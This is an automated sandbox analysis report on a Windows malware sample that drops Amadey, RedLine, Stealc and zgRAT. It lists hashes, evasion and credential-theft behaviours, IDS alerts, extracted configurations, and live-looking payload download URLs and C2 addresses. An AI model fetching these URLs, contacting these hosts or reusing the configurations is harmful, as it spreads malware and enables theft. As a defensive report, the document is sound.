Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1516777
MD5: 604496f01be7b778d8a564c57677d644
SHA1: b3a7781e8a94cadb2450c4a3df11b4a2e94ef82c
SHA256: ad1e3f88d7d1c29836570f13b8b540dfdaca9434b9f47170b00cf54519c5edcc
Tags: exeuser-jstrosch
Infos:

Detection

Amadey, PureLog Stealer, RedLine, Stealc, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Powershell download and execute
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected Stealc
Yara detected zgRAT
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Found API chain indicative of debugger detection
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops certificate files (DER)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Use Short Name Path in Command Line
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
RedLine Stealer RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
zgRAT zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for URL or domain
Source: http://185.215.113.37/X Avira URL Cloud: Label: malware
Source: http://185.215.113.37/O Avira URL Cloud: Label: malware
Source: http://147.45.44.104/malesa/66ed86be077bb_12.exe01 Avira URL Cloud: Label: malware
Source: http://185.215.113.37/H Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpk Avira URL Cloud: Label: malware
Source: http://103.130.147.211/Files/2.exe Avira URL Cloud: Label: malware
Source: http://185.215.113.117/inc/gold.exe Avira URL Cloud: Label: malware
Source: http://185.215.113.37/ata Avira URL Cloud: Label: malware
Source: http://185.215.113.100/steam/random.exe Avira URL Cloud: Label: malware
Source: http://185.215.113.16/dobre/splwow64.exe Avira URL Cloud: Label: phishing
Source: http://194.116.215.195/12dsvc.exe Avira URL Cloud: Label: malware
Source: http://185.215.113.16/inc/2.exe Avira URL Cloud: Label: phishing
Source: http://185.215.113.37/ Avira URL Cloud: Label: malware
Source: http://185.215.113.26/Nework.exe Avira URL Cloud: Label: malware
Source: http://185.215.113.16/Jo89Ku7d/index.php1K Avira URL Cloud: Label: phishing
Source: http://185.215.113.37/tSwf Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpWindows Avira URL Cloud: Label: malware
Source: http://185.215.113.16/inc/penis.exe Avira URL Cloud: Label: phishing
Antivirus detection for dropped file
Source: C:\Users\user\1000015002\b74664dd7e.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[2].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\2[1].exe Avira: detection malicious, Label: TR/Drop.Agent.fgswh
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\gold[1].exe Avira: detection malicious, Label: HEUR/AGEN.1351932
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\crypted[1].exe Avira: detection malicious, Label: HEUR/AGEN.1357677
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\LummaC222222[1].exe Avira: detection malicious, Label: HEUR/AGEN.1316118
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\penis[1].exe Avira: detection malicious, Label: TR/Spy.RedLine.ouvlp
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe Avira: detection malicious, Label: TR/AD.Stealc.pegov
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\acentric[1].exe Avira: detection malicious, Label: TR/Spy.Agent.bvpeh
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Avira: detection malicious, Label: HEUR/AGEN.1351932
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\Blenar[1].exe Avira: detection malicious, Label: HEUR/AGEN.1312961
Found malware configuration
Source: 00000006.00000002.1318437657.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 0000001F.00000002.2104172556.0000000003775000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: RedLine {"C2 url": "95.179.250.45:26212", "Bot Id": "LiveTraffic", "Message": "Error! Disable antivirus and try again!", "Authorization Header": "143feb5082f9936e624c1e27545e7d19"}
Source: 15.2.3ec4738210.exe.200000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\acentric[1].exe ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\crypted[1].exe ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\gold[1].exe ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\newbundle2[1].exe ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\2[1].exe ReversingLabs: Detection: 69%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\2[1].exe ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\66ed86be077bb_12[1].exe ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\needmoney[1].exe ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\LummaC222222[1].exe ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\penis[1].exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\splwow64[1].exe ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe ReversingLabs: Detection: 69%
Source: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Temp\1000318001\66ed86be077bb_12.exe ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Temp\1000321001\2.exe ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe ReversingLabs: Detection: 47%
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 47%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\1000015002\b74664dd7e.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[2].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\2[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\66ed86be077bb_12[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\needmoney[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\splwow64[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\penis[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 46.19.218.204:443 -> 192.168.2.7:49925 version: TLS 1.2
Source: unknown HTTPS traffic detected: 46.19.218.204:443 -> 192.168.2.7:49931 version: TLS 1.2
Source: Binary string: .pdb8 source: axplong.exe, 0000001B.00000002.3769503003.0000000001494000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rolsroice.pdb source: 66ed86be077bb_12.exe.27.dr
Source: Binary string: rolsroice.pdbX source: 66ed86be077bb_12.exe.27.dr
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E2C2A2 FindFirstFileExW, 17_2_00E2C2A2
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E668EE FindFirstFileW,FindClose, 17_2_00E668EE
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E6698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 17_2_00E6698F
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E5D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 17_2_00E5D076
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E5D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 17_2_00E5D3A9
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E69642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 17_2_00E69642
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E6979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 17_2_00E6979D
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E5DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 17_2_00E5DBBE
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E69B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 17_2_00E69B2B
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E65C97 FindFirstFileW,FindNextFileW,FindClose, 17_2_00E65C97
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe File opened: C:\Users\user\Desktop\desktop.ini

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.7:49709
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49713 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49711 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.7:49744 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.16:80 -> 192.168.2.7:49744
Source: Network traffic Suricata IDS: 2044623 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) : 192.168.2.7:49801 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49793 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044623 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) : 192.168.2.7:49830 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.7:49821 -> 95.179.250.45:26212
Source: Network traffic Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.7:49821 -> 95.179.250.45:26212
Source: Network traffic Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 95.179.250.45:26212 -> 192.168.2.7:49821
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49828 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 95.179.250.45:26212 -> 192.168.2.7:49821
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49836 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49840 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044623 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) : 192.168.2.7:49866 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044623 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) : 192.168.2.7:49879 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.7:49883 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49887 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49892 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2054416 - Severity 1 - ET MALWARE ZharkBot CnC Domain in DNS Lookup (solutionhub .cc) : 192.168.2.7:63385 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.7:49898 -> 89.105.223.196:29862
Source: Network traffic Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.7:49898 -> 89.105.223.196:29862
Source: Network traffic Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 89.105.223.196:29862 -> 192.168.2.7:49898
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49897 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2054416 - Severity 1 - ET MALWARE ZharkBot CnC Domain in DNS Lookup (solutionhub .cc) : 192.168.2.7:50747 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49902 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49907 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 89.105.223.196:29862 -> 192.168.2.7:49898
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49904 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2054416 - Severity 1 - ET MALWARE ZharkBot CnC Domain in DNS Lookup (solutionhub .cc) : 192.168.2.7:55279 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49882 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49913 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2054416 - Severity 1 - ET MALWARE ZharkBot CnC Domain in DNS Lookup (solutionhub .cc) : 192.168.2.7:61394 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49914 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.7:49915 -> 103.130.147.211:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49920 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2054416 - Severity 1 - ET MALWARE ZharkBot CnC Domain in DNS Lookup (solutionhub .cc) : 192.168.2.7:53927 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.7:49924 -> 185.215.113.67:15206
Source: Network traffic Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.7:49924 -> 185.215.113.67:15206
Source: Network traffic Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 185.215.113.67:15206 -> 192.168.2.7:49924
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49923 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 185.215.113.67:15206 -> 192.168.2.7:49924
Source: Network traffic Suricata IDS: 2054416 - Severity 1 - ET MALWARE ZharkBot CnC Domain in DNS Lookup (solutionhub .cc) : 192.168.2.7:64065 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49927 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.7:49929 -> 185.244.181.140:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.7:49932 -> 185.244.181.140:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49833 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49758 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49766 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49730 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044623 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) : 192.168.2.7:49825 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044623 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) : 192.168.2.7:49852 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044623 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) : 192.168.2.7:49855 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044623 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) : 192.168.2.7:49819 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49719 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044623 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) : 192.168.2.7:49717 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49762 -> 185.215.113.16:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor IPs: 185.215.113.43
Source: Malware configuration extractor URLs: 95.179.250.45:26212
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.7:49760 -> 95.179.250.45:26212
Downloads executable code via HTTP
